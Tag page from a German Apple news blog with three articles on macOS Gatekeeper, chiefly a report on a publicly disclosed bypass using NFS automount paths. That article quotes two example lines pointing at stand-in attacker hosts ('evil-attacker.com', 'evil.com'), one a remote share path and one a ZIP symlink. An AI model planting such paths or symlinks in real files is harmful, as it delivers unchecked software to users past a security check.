Artikel mit Tag gatekeeper
apple . privacy 2008 3d 3d audio 3d touch 3d-audio 3g 4k 5g 6g accessibility acer activity adium adobe airdrop airplay airpods airpods pro airport airports airpower airprint airtag airtags akku aktie alexa amazon amd aml android angela ahrendts animoji anker anleitung antennagate aperture apfs aple watch app app clips appel music apple arcade apple books apple cad apple car apple card apple care apple edge cache apple fitness+ apple glass apple glasses apple id apple music apple music awards apple news apple news+ apple one apple park apple pay apple pencil apple silicon apple silicon intel apple sim apple store apple tv apple tv+ apple watch apple watch pride applearcade applecard applecare appltv apps appstore arkit arm artificial intelligence asmr att augmented reality aukey award back-to-school backup beats beats 1 beats1 beddit bedienungshilfen beer bash behind the mac belkin benchmark bendgate beta big sur bildung bing bitcoin bixby black friday blackberry bleutooth blog bluetooth bmw bokeh books boon boot camp bootcamp bose bug bumper butterfly carekit carkey carplay carpool karaoke catalina catalyst cebit ceramic shield ces challenge channels charity china chip chrome cinema display cisco classkit clips cloud cloudflare cloudkit compressor connected health conrad continuity corning coronavirus cortana covid-19 craig federighi cyber monday cyberport dark mode dashboard datenschutz deal deloitte deutschland developer didi differential privacy disney disney+ display dock dolby atmos dresden drive drm dropbox dsgvo dual sim dual-sim duckduckgo earpods earth day echo eddy cue edge education ekg el capitan em emoji environment epic esim eu euro euronics europa event everyone can code eveyrone can code experiments face id facebook faceid facepalm facetime familienkonfiguration family sharing fbi festival final cut final cut pro final cut pro x find my find my iphone fire tv firefox firewire fitbit fitness fitness+ flash flexgate flickr flyover force touch fortnite fortune fotos fotostream foxconn frankfurt frontrow fundstück fusion drive fusiondrive gadget gadgets gagdet galaxy gamecenter games garageband gate ge geekbench genius geschenkkarten gewinnspiel glass google google assistant google maps google play store gorilla glass grading gravis graykey grayshift greenpeace gymkit hacker hamburg handbrake handoff hannover haptic touch hdr health healthkit high sierra home homebutton homekit homeos homepod homepod mini hongkong how-to huawai huawei hue hyundai iad ibeacon ibm ibooks ibooks author ibookstore ical icar ichat icloud icq idisk ifixit igzo ikea ilife imac imac pro imessage imovie in-app in-app abo in-app purchase indien instagram intel intercom internes internet recovery interview ios ios 7 ios ipad ipad ipad event ipad mini ipad pro ipados iphoen iphone iphone o2 iphone rumor iphone x iphoto ipod ipod nano ipod shuffle ipod touch iradio iring irland iscloud isight itunes itunes festival itunes in der cloud itunes lp itunes match itunes radio itunes tv itunes u iwatch iweb iwork jahresrückblick jailbreak java jeff williams jimmy iovine jony ive kamera karten keynote kommentar lala leak leopard lg lgbtq libratone lidar lightning linux lion liquidmetal live fotos location logic pro logic pro x look around lossless lte luca maestri m1 m1x mac mac mini mac os mac os x mac pro macbbok macbbok pro macbook macbook air macbook pro machine learning machinenlernen macos macos big sur macos update macpro macworld made for iphone magazines magic keyboard magic mouse magic trackpad magna magsafe mail main stage mainstage malware maps marzipan maschinenlernen mavereicks mavericks mdatenschutz media markt mediamarkt meltdown memoji meross mesh mfi micro oled micro-led microled microsoft mini led mini-led miniled mixed reality mobileme mockup mojave monterey montery motion mountain lion mozilla mp3 münchen multi touch multitasking multitouch music musik musikmemo mutlitasking navigon nest netflix netzneutralität news news flash newsflash nfc night shift nike nintendo noise cancelling noisegate nokia notch nsa numbers nvidia o2 office oled oracle orchard os x pages parallels partnerschaft passbook patent paypal pegasus pegatron pencil perlen personal personal hotspot phil schiller philips hue phishing ping pixel planet of the apps play store playgrounds pns podcast podcasts power nap powerbeats pressemitteilung pride prime prism privacy privates privatfreigabe pro display pro display xdr pro mode product red project catalyst project titan projekte promo promotion proraw puma pwerbeats qi qualcomm quartalszahlen quicktime ranking ransomware reachability reading list red remote reparaturprogramm research research kit researchkit responsibility retail retaiul retaul retina review ros rosetta rosetta 2 roundup rückruf rumor safari salesforce samsung sap saphirglas satire saturn saumsung schlüsselbund schoolwork scott forstall screen time screentime scribble scurity sdk search ads security selfie service serviceprogramm shazam shortcuts shot on iphone sicherheit sidecar sierra sierra tvos sign in with apple siri siri remote skeuomorphismus sky skype slofie smart battery case smart connector smart cover smart glass smart home smart keyboard smartphone snapchat snow leopard software solo loop sommercamp sommerloch sonos spam spatial audio spectre spende spigen spoiler spotify ssd staingate star starbucks steve ballmer steve jobs steve wozniak store studie support swatch swift t-mobile t2 tablet tag der erde taptic engine teardown technik ted lasso telekom terminal tesla testflight tethering texture the daily think different thunderbold thunderbolt thunderbolt display ticker tidal tiger tiktok tile tim cook time capsule time machine tipp today at apple tomtom toshiba touch bar touch id touchbar tracing tracking trade-in trailer transparenz transparenzbericht transporter true tone truedepth tsmc turi tutorial tutorials tv tvos tvos update twitter u1 übernahme umfrage umts umwelt umweltschutz unboxing unter der lupe update usa usb usb-c vein id vimeo virtual reality virus vista vodafone voice over voicemail vorschau vpn vw walkie-talkie wallet wapple watch watch os watchkit watchos wearable wearables weatherpro webclips webkit wechat werables werbung whatsapp where is whitepaper widget widgets wien wifi wikipedia windows wlan wo ist wwdc xcode xiaomi xserve yahoo yosemite youtube zahlen zeitungskiosk zoom zwei-faktor authentifizierung allgemeines anyfont appel blitzangebote reminder corona corona-warn-app covpass deal amazon ebay gameclub gesponsert ifttt jawbone joyn kindle linksammlung nachrichten outbank outlook photoshop pinterest rss sms spyware sygic telegram tumblr uber iot apple rumor apstore game gopro nordlocker vlc dsl iOS watchOS Xcode appe
Mai 27: Ungestopfte Sicherheitslücke in macOS erlaubt das Umgehen des Gatekeepers
Der Sicherheitsexperte Filippo Cavallarin sorgte über das Wochenende für Aufsehen, indem er eine Schwachstelle im Gatekeeper von macOS öffentlich machte, mit der sich diese Sicherheitsfunktion umgehen lässt. Dies gilt auch nach dem in der vergangenen Woche veröffentlichten Update auf macOS 10.14.5. Zur Erinnerung: Der Gatekeeper sorgt in macOS dafür, dass aus dem Internet heruntergeladene Software unmittelbar auf ihre Herkunft geprüft und der Nutzer evtl. entsprechend gewarnt wird, sollte diese nicht vertrauenswürdig sein.
Laut Cavallarin kann diese Maßnahme jedoch komplett umgangen werden, was vor allem daran liegt, dass der Gatekeeper auch externe Festplatten und Netzlaufwerke pauschal als sichere Herkunftsorte einstuft. Dies bedeutet im Imkehrschluss, dass Software von diesen Orten nicht noch einmal auf ihre Sicherheit hin überprüft werden. Dem Sicherheitsforscher zufolge kann ein Nutzer jedoch relativ einfach in eine Falle gelockt werden, ein manipuliertes Netzlaufwerk zu mounten, von dem dann Software installiert werden kann, ohne dass der Gatekeeper hier eingreift.
So könnte mit dem Pfad "ls /net/evil-attacker.com/sharedfolder/" beispielsweise der Inhalt des Ordners "sharedfolder" auf einem entfernten Server mit der Adresse "evil-attacker.com" per NFS gemountet werden. Zudem können auch in ZIP-Archiven symbolische Links enthalten sein, die ebenfalls eine Möglichkeit bieten, den Gatekeeper zu umgehen. So könnte ein solcher Link beispielsweise auf "Documents -> /net/evil.com/Documents" lauten, wodurch sich der Nutzer nicht mehr auf seinem lokalen Rechner befände, sondern auf dem Ordner "Documents" auf dem Server von evil.com.
Cavallarin habe nach eigener Aussage Apple über die Sicherheitslücke am 22. Februar informiert und das Unternehmen wollte sie eigentlich mit mscOS 10.14.5 in der vergangenen Woche stopfen. Da das 90 Tage Fenster für die Geheimhaltung der Lücke inzwischen verstrichen ist und Apple auch nicht mehr auf E-Mails von Cavallarin reagiert, wurde sie nun öffentlich gemacht. Das nachfolgende Video zeigt sie in Aktion:
Sep 19: Apple veröffentlicht OS X 10.7.5 inkl. Gatekeeper
Auch Mac-Nutzer, die noch nicht auf Mountain Lion umgestiegen sind dürfen sich am heutigen Abend über ein Update freuen. Zwar wurde der Vorgänger OS X Lion im Juli abgelöst, heute schiebt Apple abder die vermutlich letzte Sicherheitsaktualisierung hinterher, die wie üblich allen Anwendern des Betriebssystems empfohlen wird. Die vielleicht wichtigste und interessanteste Neuerung in OS X 10.7.5 ist die von Mountain Lion bekannte neue Sicherheitsfunktion "Gatekeeper". Hierüber hat der Nutzer die Möglichkeit, festzulegen woher die Software stammen darf, die auf seinem Mac installiert wird. Dabei kann die Wahl entweder ausschließlich auf Software aus dem Mac App Store fallen, auf Software aus dem Mac App Store oder von durch Apple zertifizierte Entwicklern oder wie gehabt Software aus beliebiger Herkunft. Als weitere Inhalte in OS X 10.7.5 nennt Apple allgemeine Fehlerbehebungen, wie zum Beispiel die Behebung eines Problems mit mangelhafter Stabilität von WLAN-Verbindungen beim iMac oder auch eine sporadisch auftretende zufälliger Sortierung von App-Icons im Launchpad. Jul 28: Erste Entwickler kehren Mac AppStore den Rücken
Während der Mac AppStore für so manchen User eine einfache und komfortable Möglichkeit ist, Software auf den Mac zu laden, werden die damit verbundenen Einschränkungen und Bedingungen für manchen Entwickler zum Ärgernis. Dies führt gar soweit, dass diverse, durchaus namhafte Entwickler ihre Apps inzwischen wieder aus dem AppStore entfernen und stattdessen wieder auf herkömmlichen Wege vertreiben. Mit dem am Mittwoch veröffentlichten OS X Mountain Lion und der darin enthaltenen Gatekeeper-Funktion dürfte sich diese Situation noch einmal verschärfen. Standardmäßig gestattet dieser nämlich ausschließlich die Installation von Apps aus dem AppStore, was für den Benutzer neben dem angesprochenen Komfort auch eine erhöhte Sicherheit vor Schadsoftware bietet. Dies liegt nicht zuletzt daran, dass Apple von Apps im Mac AppStore seit dem 01. Juni verlangt, dass diese in einer "Sandbox", also einem vom Rest des Betriebssystems abgeschotteten Bereich laufen. Und genau hierin liegt für viele Entwickler das Problem. Innerhalb der Sandbox besitzen die Apps nur begrenzte Rechte, was unter anderem dazu geführt hat, dass beispielsweise Postbox, Anbieter einer E-Mail-Software, seine Apps wieder aus dem Mac AppStore entfernt hat. Grund hierfür ist die Tatsache, dass sich durch die Sandbox keine Add-Ons mehr installieren ließen und kein direkter Zugriff mehr auf iCal und iPhoto bestand. Weiterlesen...
